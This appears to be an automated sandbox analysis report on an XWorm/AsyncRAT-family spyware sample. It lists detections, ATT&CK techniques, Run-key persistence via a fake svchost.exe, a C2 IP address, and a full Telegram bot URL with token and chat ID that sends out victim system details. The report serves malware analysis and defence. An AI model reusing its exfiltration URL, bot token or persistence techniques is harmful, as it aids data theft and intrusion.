                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\svchost.exeQueries volume information: C:\Users\user\AppData\Local\svchost.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\svchost.exeQueries volume information: C:\Users\user\AppData\Local\svchost.exe VolumeInformation
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: file.exe, 00000000.00000002.2963211372.000000001B9A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2943457203.0000000000A93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                        Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: file.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2950679638.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2950679638.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPED

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR
                        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                        Source: Yara matchFile source: file.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2950679638.0000000002A23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2950679638.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 7312, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                        Windows Management Instrumentation
                        21
                        Registry Run Keys / Startup Folder
                        12
                        Process Injection
                        11
                        Masquerading
                        OS Credential Dumping221
                        Security Software Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Web Service
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        PowerShell
                        1
                        DLL Side-Loading
                        21
                        Registry Run Keys / Startup Folder
                        11
                        Disable or Modify Tools
                        LSASS Memory2
                        Process Discovery
                        Remote Desktop Protocol1
                        Clipboard Data
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        DLL Side-Loading
                        131
                        Virtualization/Sandbox Evasion
                        Security Account Manager131
                        Virtualization/Sandbox Evasion
                        SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Standard Port
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                        Process Injection
                        NTDS1
                        Application Window Discovery
                        Distributed Component Object ModelInput Capture1
                        Ingress Tool Transfer
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        File and Directory Discovery
                        SSHKeylogging2
                        Non-Application Layer Protocol
                        Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                        Obfuscated Files or Information
                        Cached Domain Credentials13
                        System Information Discovery
                        VNCGUI Input Capture13
                        Application Layer Protocol
                        Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560514 Sample: file.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 36 api.telegram.org 2->36 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 52 14 other signatures 2->52 8 file.exe 15 6 2->8         started        13 svchost.exe 2->13         started        15 svchost.exe 2->15         started        signatures3 50 Uses the Telegram API (likely for C&C communication) 36->50 process4 dnsIp5 38 87.120.112.33, 49755, 8398 UNACS-AS-BG8000BurgasBG Bulgaria 8->38 40 api.telegram.org 149.154.167.220, 443, 49749 TELEGRAMRU United Kingdom 8->40 34 C:\Users\user\AppData\Local\svchost.exe, PE32 8->34 dropped 54 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->54 56 Protects its processes via BreakOnTermination flag 8->56 58 Bypasses PowerShell execution policy 8->58 66 2 other signatures 8->66 17 powershell.exe 23 8->17         started        20 powershell.exe 23 8->20         started        22 powershell.exe 21 8->22         started        24 powershell.exe 8->24         started        60 Antivirus detection for dropped file 13->60 62 Multi AV Scanner detection for dropped file 13->62 64 Machine Learning detection for dropped file 13->64 file6 signatures7 process8 signatures9 42 Loading BitLocker PowerShell Module 17->42 26 conhost.exe 17->26         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        process10

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        file.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        file.exe100%AviraTR/Spy.Gen
                        file.exe100%Joe Sandbox ML
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\svchost.exe100%AviraTR/Spy.Gen
                        C:\Users\user\AppData\Local\svchost.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\svchost.exe76%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt00%Avira URL Cloudsafe
                        87.120.112.330%Avira URL Cloudsafe
                        http://crl.mw0%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        199.232.210.172
                        truefalse
                          high
                          api.telegram.org
                          149.154.167.220
                          truefalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                              high
                              87.120.112.33true
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0powershell.exe, 00000001.00000002.1770104920.0000021FF1740000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1758662678.0000021F90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860676438.000001B6CE7C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2049175145.000001D6D8F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgfile.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botfile.exe, svchost.exe.0.drfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1741638824.0000021F80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C92C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000001.00000002.1768900045.0000021FF1621000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.micpowershell.exe, 00000001.00000002.1767227966.0000021FF13B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2289580802.0000022735177000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://crl.mpowershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crl.microsopowershell.exe, 00000001.00000002.1768716785.0000021FF1532000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E16BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://crl.mwpowershell.exe, 00000001.00000002.1770104920.0000021FF16F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1741638824.0000021F80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C92C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1758662678.0000021F90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860676438.000001B6CE7C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2049175145.000001D6D8F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.micft.cMicRosofpowershell.exe, 00000001.00000002.1767227966.0000021FF13B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2289580802.0000022735177000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1741638824.0000021F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C8F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271C921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://api.telegram.orgfile.exe, 00000000.00000002.2950679638.0000000002ABD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefile.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741638824.0000021F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C8F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271C921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://crl.microspowershell.exe, 00000007.00000002.2081462859.000001D6E14B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=14704file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          149.154.167.220
                                                                          api.telegram.orgUnited Kingdom
                                                                          62041TELEGRAMRUfalse
                                                                          87.120.112.33
                                                                          unknownBulgaria
                                                                          25206UNACS-AS-BG8000BurgasBGtrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1560514
                                                                          Start date and time:2024-11-21 22:20:07 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 25s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:16
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:file.exe
                                                                          Detection:MAL
                                                                          Classification:mal100.troj.evad.winEXE@15/21@1/2
                                                                          EGA Information:
                                                                          • Successful, ratio: 14.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 74
                                                                          • Number of non-executed functions: 9
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .exe
                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7412 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7640 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 7880 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 8136 because it is empty
                                                                          • Execution Graph export aborted for target svchost.exe, PID 5664 because it is empty
                                                                          • Execution Graph export aborted for target svchost.exe, PID 7480 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • VT rate limit hit for: file.exe
                                                                          TimeTypeDescription
                                                                          16:21:03API Interceptor55x Sleep call for process: powershell.exe modified
                                                                          16:22:06API Interceptor152x Sleep call for process: file.exe modified
                                                                          21:22:05AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
                                                                          21:22:13AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run svchost C:\Users\user\AppData\Local\svchost.exe
                                                                          21:22:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          149.154.167.220file.exeGet hashmaliciousUnknownBrowse
                                                                            bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                              bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                  Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                    CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                      Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                          Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                            Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              87.120.112.33file.exeGet hashmaliciousXWormBrowse
                                                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                  file.exeGet hashmaliciousXWormBrowse
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    bg.microsoft.map.fastly.netFW_ Signature Required For Agreement with ID_41392PJBM8759674.msgGet hashmaliciousUnknownBrowse
                                                                                                    • 199.232.210.172
                                                                                                    [EXTERNAL] Oakville shared ''o_akville_853473074_21.11.2024''.emlGet hashmaliciousUnknownBrowse
                                                                                                    • 199.232.210.172
                                                                                                    mORxR4LsiI.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 199.232.210.172
                                                                                                    Kellyb Timesheet Report.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 199.232.214.172
                                                                                                    estimate Cost.pdfGet hashmaliciousUnknownBrowse
                                                                                                    • 199.232.214.172
                                                                                                    mLi58UzdI2.dllGet hashmaliciousUnknownBrowse
                                                                                                    • 199.232.210.172
                                                                                                    1.e.msiGet hashmaliciousDanaBotBrowse
                                                                                                    • 199.232.214.172
                                                                                                    F2.exeGet hashmaliciousBlackMoonBrowse
                                                                                                    • 199.232.214.172
                                                                                                    test2.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 199.232.210.172
                                                                                                    file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                    • 199.232.214.172
                                                                                                    api.telegram.orgfile.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Wire slip account payable.pif.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Order requirements CIF Greece_pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    TELEGRAMRUfile.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    bZPAo2e2Pv.jarGet hashmaliciousCan StealerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    S0FTWARE.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                    • 149.154.167.99
                                                                                                    order requirements CIF-TRC809945210.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    • 149.154.167.220
                                                                                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.99
                                                                                                    qaHUaPUib8.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.99
                                                                                                    Updated Invoice_0755404645-2024_pdf.exeGet hashmaliciousUnknownBrowse
                                                                                                    • 149.154.167.220
                                                                                                    CONTRACT COPY PRN00720387_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    • 149.154.167.220
                                                                                                    Request for Quotation MK FMHS.RFQ.24.11.21.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 149.154.167.220
                                                                                                    UNACS-AS-BG8000BurgasBGListing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                    • 87.120.115.30
                                                                                                    G0822412237079O_Details_recal_pdf.jsGet hashmaliciousWSHRATBrowse
                                                                                                    • 87.120.115.30
                                                                                                    Listing_error_15_code_file-002.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                    • 87.120.115.30
                                                                                                    NeftPaymentError_details__Emdtd22102024_jpg.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                    • 87.120.115.30
                                                                                                    https://www.plushtoysmfg.com/plush-keychain-factory/Get hashmaliciousAnonymous ProxyBrowse
                                                                                                    • 87.120.125.158
